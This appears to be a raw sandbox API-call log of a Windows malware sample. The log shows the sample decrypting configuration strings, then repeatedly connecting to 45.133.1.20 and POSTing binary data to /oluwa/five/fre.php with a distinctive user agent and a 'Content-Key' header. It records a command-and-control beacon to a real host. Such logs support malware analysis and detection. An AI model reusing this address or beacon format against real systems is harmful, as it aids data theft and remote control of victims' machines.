0x6b0c10 [0272.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.368] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0272.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.370] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.371] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.371] GetProcessHeap () returned 0x6a0000 [0272.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.373] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0272.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.375] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0272.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.376] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0272.376] GetProcessHeap () returned 0x6a0000 [0272.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.377] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.378] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.380] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.381] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.382] GetProcessHeap () returned 0x6a0000 [0272.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0272.382] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.382] GetProcessHeap () returned 0x6a0000 [0272.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0272.383] GetProcessHeap () returned 0x6a0000 [0272.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.383] GetProcessHeap () returned 0x6a0000 [0272.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0272.383] GetProcessHeap () returned 0x6a0000 [0272.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0272.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.385] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.392] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0272.401] GetProcessHeap () returned 0x6a0000 [0272.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.402] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0272.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.404] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.405] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.405] GetProcessHeap () returned 0x6a0000 [0272.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.407] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0272.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.408] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0272.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.409] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0272.409] GetProcessHeap () returned 0x6a0000 [0272.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.410] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0272.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.411] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0272.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.412] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0272.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.414] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0272.414] GetProcessHeap () returned 0x6a0000 [0272.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0272.414] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0272.414] GetProcessHeap () returned 0x6a0000 [0272.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0272.414] socket (af=2, type=1, protocol=6) returned 0x9a4 [0272.415] connect (s=0x9a4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0272.440] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0272.440] GetProcessHeap () returned 0x6a0000 [0272.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0272.441] GetProcessHeap () returned 0x6a0000 [0272.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0272.441] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.442] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.442] GetProcessHeap () returned 0x6a0000 [0272.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9db0 [0272.442] GetProcessHeap () returned 0x6a0000 [0272.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.443] GetProcessHeap () returned 0x6a0000 [0272.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0272.443] GetProcessHeap () returned 0x6a0000 [0272.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0272.444] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.445] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.445] GetProcessHeap () returned 0x6a0000 [0272.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0272.445] GetProcessHeap () returned 0x6a0000 [0272.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.445] send (s=0x9a4, buf=0x6bd460*, len=242, flags=0) returned 242 [0272.446] send (s=0x9a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0272.446] GetProcessHeap () returned 0x6a0000 [0272.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0272.446] recv (in: s=0x9a4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0272.522] GetProcessHeap () returned 0x6a0000 [0272.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0272.523] GetProcessHeap () returned 0x6a0000 [0272.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0272.524] GetProcessHeap () returned 0x6a0000 [0272.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9db0 | out: hHeap=0x6a0000) returned 1 [0272.525] GetProcessHeap () returned 0x6a0000 [0272.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0272.525] closesocket (s=0x9a4) returned 0 [0272.526] GetProcessHeap () returned 0x6a0000 [0272.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0272.526] GetProcessHeap () returned 0x6a0000 [0272.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.526] GetProcessHeap () returned 0x6a0000 [0272.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0272.527] GetProcessHeap () returned 0x6a0000 [0272.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0272.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1734) returned 0x9a4 [0272.529] Sleep (dwMilliseconds=0xea60) [0272.531] GetProcessHeap () returned 0x6a0000 [0272.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0272.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.533] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.544] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0272.554] GetProcessHeap () returned 0x6a0000 [0272.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0272.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.555] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0272.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.556] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.557] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.557] GetProcessHeap () returned 0x6a0000 [0272.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0272.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.559] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0272.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.560] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0272.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.567] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0272.567] GetProcessHeap () returned 0x6a0000 [0272.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.568] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.569] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.570] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.570] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.571] GetProcessHeap () returned 0x6a0000 [0272.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0272.571] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.571] GetProcessHeap () returned 0x6a0000 [0272.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0272.572] GetProcessHeap () returned 0x6a0000 [0272.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.573] GetProcessHeap () returned 0x6a0000 [0272.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0272.574] GetProcessHeap () returned 0x6a0000 [0272.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0272.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.575] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0272.590] GetProcessHeap () returned 0x6a0000 [0272.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.592] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0272.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.593] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.597] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.597] GetProcessHeap () returned 0x6a0000 [0272.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.599] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0272.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.600] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0272.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.601] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0272.601] GetProcessHeap () returned 0x6a0000 [0272.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.602] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0272.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.603] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0272.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.603] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0272.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.604] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0272.605] GetProcessHeap () returned 0x6a0000 [0272.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0272.605] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0272.605] GetProcessHeap () returned 0x6a0000 [0272.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0272.605] socket (af=2, type=1, protocol=6) returned 0x9a8 [0272.605] connect (s=0x9a8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0272.626] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0272.626] GetProcessHeap () returned 0x6a0000 [0272.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0272.626] GetProcessHeap () returned 0x6a0000 [0272.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0272.628] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.629] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.629] GetProcessHeap () returned 0x6a0000 [0272.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0272.629] GetProcessHeap () returned 0x6a0000 [0272.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.630] GetProcessHeap () returned 0x6a0000 [0272.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0272.630] GetProcessHeap () returned 0x6a0000 [0272.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0272.630] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.631] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.631] GetProcessHeap () returned 0x6a0000 [0272.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0272.631] GetProcessHeap () returned 0x6a0000 [0272.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.632] send (s=0x9a8, buf=0x6bd460*, len=242, flags=0) returned 242 [0272.632] send (s=0x9a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0272.632] GetProcessHeap () returned 0x6a0000 [0272.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0272.632] recv (in: s=0x9a8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0272.716] GetProcessHeap () returned 0x6a0000 [0272.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0272.718] GetProcessHeap () returned 0x6a0000 [0272.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0272.719] GetProcessHeap () returned 0x6a0000 [0272.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0272.719] GetProcessHeap () returned 0x6a0000 [0272.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0272.719] closesocket (s=0x9a8) returned 0 [0272.720] GetProcessHeap () returned 0x6a0000 [0272.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0272.720] GetProcessHeap () returned 0x6a0000 [0272.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.721] GetProcessHeap () returned 0x6a0000 [0272.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0272.721] GetProcessHeap () returned 0x6a0000 [0272.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0272.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1738) returned 0x9a8 [0272.724] Sleep (dwMilliseconds=0xea60) [0272.726] GetProcessHeap () returned 0x6a0000 [0272.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0272.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.728] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.736] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0272.746] GetProcessHeap () returned 0x6a0000 [0272.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.747] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0272.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.748] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.750] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.750] GetProcessHeap () returned 0x6a0000 [0272.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) 